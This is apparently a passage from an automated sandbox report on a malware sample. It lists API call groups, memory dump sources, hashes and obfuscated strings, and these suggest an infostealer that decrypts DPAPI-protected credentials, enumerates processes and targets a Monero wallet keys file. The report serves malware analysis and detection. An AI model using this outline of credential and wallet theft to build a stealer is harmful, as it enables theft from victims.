                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DC7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00DC7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00DC72A4
                                • LocalFree.KERNEL32(?), ref: 00DC72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: a7c4b1f3bfeb43d9149c72a783b3701d9c545caaaa0a0db945f0933c9db1c9a4
                                • Instruction ID: f3d7dcf1036a9ef450dc55e56858350c5ed0381d4e1ee807d9e57dd04de484c4
                                • Opcode Fuzzy Hash: a7c4b1f3bfeb43d9149c72a783b3701d9c545caaaa0a0db945f0933c9db1c9a4
                                • Instruction Fuzzy Hash: 8C010075B40308FBEB20DBD4CD45F9EB778AB44700F104158FB45AB2C4D6B5AA018B65
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DD961E
                                • Process32First.KERNEL32(00DE0ACA,00000128), ref: 00DD9632
                                • Process32Next.KERNEL32(00DE0ACA,00000128), ref: 00DD9647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00DD965C
                                • CloseHandle.KERNEL32(00DE0ACA), ref: 00DD967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 4d86921ff20933b5ed03d372965d99a6106a89201bacd89d607760647b15c6d3
                                • Instruction ID: 2bdec534221fa45d01c06ff6ebbc659c2fa556d4508576c5b5d3984b57232e77
                                • Opcode Fuzzy Hash: 4d86921ff20933b5ed03d372965d99a6106a89201bacd89d607760647b15c6d3
                                • Instruction Fuzzy Hash: 8701E975A00208EBDB25DFA5C958BEDB7F8EB48700F144189A94A97240D736DB44CF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *Vm$M"v|$Z~{$|!i;
                                • API String ID: 0-317792751
                                • Opcode ID: 3d4f29ebab1ca1cabb62b14a2818ed7031c53d9c5f93b02afe3f599de2d28b1a
                                • Instruction ID: e2b691c797548e092240163ed27020e91f927cacde83e6921f7d864a0717ee7e
                                • Opcode Fuzzy Hash: 3d4f29ebab1ca1cabb62b14a2818ed7031c53d9c5f93b02afe3f599de2d28b1a
                                • Instruction Fuzzy Hash: 90B26AF3A0C2149FE304AE2DEC8567AFBE5EF94720F1A853DEAC5C3744E93158058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %!m$F@g~$l#V$|:n?
                                • API String ID: 0-2933132540
                                • Opcode ID: 8c0f305d7e6ef38275774e881cacb441fd8858528c943fb93debf558e2983be2
                                • Instruction ID: 4cce3f36006feffa00fee7b127aa378497b85846b1acff9b988c9760d7dfddf3
                                • Opcode Fuzzy Hash: 8c0f305d7e6ef38275774e881cacb441fd8858528c943fb93debf558e2983be2
                                • Instruction Fuzzy Hash: 81B206F3A0C6009FE308AE29DC8567EF7E5EF94720F1A892DE6C487744EA3558418797
                                APIs
                                  • Part of subcall function 00DDA740: lstrcpy.KERNEL32(00DE0E17,00000000), ref: 00DDA788
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00DE05B7), ref: 00DD86CA
                                • Process32First.KERNEL32(?,00000128), ref: 00DD86DE
                                • Process32Next.KERNEL32(?,00000128), ref: 00DD86F3
                                  • Part of subcall function 00DDA9B0: lstrlen.KERNEL32(?,01629208,?,\Monero\wallet.keys,00DE0E17), ref: 00DDA9C5
                                  • Part of subcall function 00DDA9B0: lstrcpy.KERNEL32(00000000), ref: 00DDAA04
                                  • Part of subcall function 00DDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DDAA12
                                  • Part of subcall function 00DDA8A0: lstrcpy.KERNEL32(?,00DE0E17), ref: 00DDA905
                                • CloseHandle.KERNEL32(?), ref: 00DD8761
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: db226194f2b076474b21416563ca1d0b87e299b8ac60b904bd9c3fb54787124f
                                • Instruction ID: b4a7b5ac5ac650fe6b935d5ea9c8d5b8be4567fa0b9dbe521baba280bb707639
                                • Opcode Fuzzy Hash: db226194f2b076474b21416563ca1d0b87e299b8ac60b904bd9c3fb54787124f
                                • Instruction Fuzzy Hash: 49316B71901258EBCB25EF99CC41FEEB778FF44700F10819AE50AA2290DB346A45CFB1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(00000000,00DC5184,40000001,00000000,00000000,?,00DC5184), ref: 00DD8EC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptString
                                • String ID:
                                • API String ID: 80407269-0
                                • Opcode ID: 741c0fd239c578805610c347a118e8ffad907bd4b414d1210b7c8b47b3296440
                                • Instruction ID: 19f4d1723277b08a8a0c0d326a2a0dd3124191adba3db2448857df9ecfd28d28
                                • Opcode Fuzzy Hash: 741c0fd239c578805610c347a118e8ffad907bd4b414d1210b7c8b47b3296440
                                • Instruction Fuzzy Hash: 0E110374200208FFDB11CF64E884FAA73AAAF89310F109549F959CB340DB36E941EB70
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DC4EEE,00000000,00000000), ref: 00DC9B2A
                                • LocalFree.KERNEL32(?,?,?,?,00DC4EEE,00000000,?), ref: 00DC9B3F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 8f568acf23c9499cfec76ef5248dd2f9ade38a4b1a8e4582113088d1344e7578
                                • Instruction ID: 5c57b86bae2c2596dc8b871e0d88b3ad842e5da0d712afac87011b33440624f2
                                • Opcode Fuzzy Hash: 8f568acf23c9499cfec76ef5248dd2f9ade38a4b1a8e4582113088d1344e7578
                                • Instruction Fuzzy Hash: 7711A4B4240308FFEB11CF64D895FAAB7B5FB89700F208058F9159B384C776AA01CB50
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00DE0E00,00000000,?), ref: 00DD79B0
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD79B7
                                • GetLocalTime.KERNEL32(?,?,?,?,?,00DE0E00,00000000,?), ref: 00DD79C4
                                • wsprintfA.USER32 ref: 00DD79F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: a4bb57b37b8dacd190417e25b10eeb4bd5b43b5023bcd538e7294badf30afb5f
                                • Instruction ID: 41402793664818eb4e25be60eb5992a060379c281e5d24da33bf8a1628b6a65f
                                • Opcode Fuzzy Hash: a4bb57b37b8dacd190417e25b10eeb4bd5b43b5023bcd538e7294badf30afb5f
                                • Instruction Fuzzy Hash: 4B112AB2A04218EBCB14DFD9D945BBEB7F8FB4CB11F10415AF645A2284E23D5940C7B0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0162E0E0,00000000,?,00DE0E10,00000000,?,00000000,00000000), ref: 00DD7A63
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00DD7A6A
                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0162E0E0,00000000,?,00DE0E10,00000000,?,00000000,00000000,?), ref: 00DD7A7D
                                • wsprintfA.USER32 ref: 00DD7AB7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID:
                                • API String ID: 3317088062-0
                                • Opcode ID: 9b9b57f5064b4ee25f585a448a5ab17075cf91a3e66688848344ed138b436db6
                                • Instruction ID: 2e353270c56c919a52253d579991a1e3d4d110ed761101b4d78aaab687d8287a
                                • Opcode Fuzzy Hash: 9b9b57f5064b4ee25f585a448a5ab17075cf91a3e66688848344ed138b436db6
                                • Instruction Fuzzy Hash: B71182B1A45218DFDB20CB54DC45F59B778FB04721F1043DAE50A932C0D7745A44CF61
                                APIs
                                • CoCreateInstance.COMBASE(00DDE118,00000000,00000001,00DDE108,00000000), ref: 00DD3758
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00DD37B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWide
                                • String ID:
                                • API String ID: 123533781-0
                                • Opcode ID: 0337639a62c5c241b3c3e909ba00716224023d127811d05cc2c75ed8ed6cdab9
                                • Instruction ID: 369ad08a3ea47faccc043f5f9235d343011d8c313de6ab1151663d5b88d56387
                                • Opcode Fuzzy Hash: 0337639a62c5c241b3c3e909ba00716224023d127811d05cc2c75ed8ed6cdab9
                                • Instruction Fuzzy Hash: 8B41C970A40A189FDB24DB58CC95B9BB7B5FB48702F4041D9E609EB290D771AE85CF60
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,co$zoo$/[
                                • API String ID: 0-3143629062
                                • Opcode ID: ce2c4dde8e8bf14d4f1182040408e5f8a2f8dec34d58b9a184a700b236f2409a
                                • Instruction ID: 87b295c5218b642c4187418f38e38c218fdbb0a30914685b57758eb2d1eea372
                                • Opcode Fuzzy Hash: ce2c4dde8e8bf14d4f1182040408e5f8a2f8dec34d58b9a184a700b236f2409a
                                • Instruction Fuzzy Hash: B03227F3A0C2049FE7086E2DEC8567AFBE5EF94320F16463DEAC5C7344EA3558058696
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DC9B84
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00DC9BA3
                                • LocalFree.KERNEL32(?), ref: 00DC9BD3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: 5816de3383cd037d267ff6987d8ed37914ae58bff286901072a56b8f95ca9ad6
                                • Instruction ID: 824eb24b9c3a3adcb5a6fc4d6bddaa596d67ea0fba61b848395bec30cd47834a
                                • Opcode Fuzzy Hash: 5816de3383cd037d267ff6987d8ed37914ae58bff286901072a56b8f95ca9ad6
                                • Instruction Fuzzy Hash: A21109B8A00209EFDB05DF94D989EAEB7B5FF88300F104598E815A7340D775AE11CFA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3u?$6o;w$v8}{
                                • API String ID: 0-2025310420
                                • Opcode ID: 30a5c4a02119e3ed72f2e00a2a03046b0ee6d398bb46c2a7217e8b013b57773e
                                • Instruction ID: 8a91367046e1edf1d0f8cdcd9fe36c28c74059c9cf22c7b3a9a8229fe15439b3
                                • Opcode Fuzzy Hash: 30a5c4a02119e3ed72f2e00a2a03046b0ee6d398bb46c2a7217e8b013b57773e
                                • Instruction Fuzzy Hash: 533236F390C2149FE3087E2DEC8567ABBE9EF94320F16453DEAC483744EA3598458697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 6<X$Kv_
                                • API String ID: 0-2771333070
                                • Opcode ID: af1563c90fd8314eca6074b5f6f1f5e70953b0afd3fda17ea4d4dd0e68afcc1a
                                • Instruction ID: c985263e87d7bc8598266a0842f816c0f500a1b339e53d441c8b735441833bbf
                                • Opcode Fuzzy Hash: af1563c90fd8314eca6074b5f6f1f5e70953b0afd3fda17ea4d4dd0e68afcc1a
                                • Instruction Fuzzy Hash: C3B206F3A0C2049FE304AE2DEC8567AF7E5EF94720F1A453DEAC5C7744EA3558018696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Txov$g;_^
                                • API String ID: 0-502869318
                                • Opcode ID: 7f6ac7d9d47fba336cfd013dd7d4d4c2c9eed1d139bc4098d8772b2350b6a343
                                • Instruction ID: 5922656613871357f2d589786ed89e2e040da99ff0c28d2e013834ec303c2b7e
                                • Opcode Fuzzy Hash: 7f6ac7d9d47fba336cfd013dd7d4d4c2c9eed1d139bc4098d8772b2350b6a343
                                • Instruction Fuzzy Hash: E041E7F3E091105BF344EA2ADC4472ABBD7DBD4310F2AC539DA84D3788E93958054696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: >nn
                                • API String ID: 0-1423885210
                                • Opcode ID: 88c1f6d3dd5ed8729293b01341b3470850654cbdedc80cb06096a82469eb84b7
                                • Instruction ID: 903b02ce03b0ebec473fccfc91f3357d755936dce93799ef7690614d613bbab9
                                • Opcode Fuzzy Hash: 88c1f6d3dd5ed8729293b01341b3470850654cbdedc80cb06096a82469eb84b7
                                • Instruction Fuzzy Hash: F47106B39087109FE304AE6DDCC976ABBE5EF98320F1A8A3DEAC4D7744D57458058782
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000EA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.000000000100A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000011A1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000127B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.000000000129F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012A6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747340780.00000000012B5000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747664665.00000000012B6000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747799643.000000000144C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747821540.000000000144D000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_dc0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: cRf%
                                • API String ID: 0-525100361
                                • Opcode ID: f06ad5dc02c1b6512d4a4d1d60b4605cf58d800b4ff00a95c1cbeb0549346c45
                                • Instruction ID: c3acedac9503a5c9a7adac7b325b43837bfc1e80f058a66b72d339a2cf22e415
                                • Opcode Fuzzy Hash: f06ad5dc02c1b6512d4a4d1d60b4605cf58d800b4ff00a95c1cbeb0549346c45
                                • Instruction Fuzzy Hash: BB61F7F3E082105FF3189E19EC9577AB7D5EF98320F1A453DEA8887380E97A5C018796
                                Memory Dump Source
                                • Source File: 00000000.00000002.1747340780.000000000101E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                 • Associated: 00000000.00000002.1747124751.0000000000DC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000DC1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1747144020.0000000000E71000.00000040.00000001.01000000.00000003.sdmp
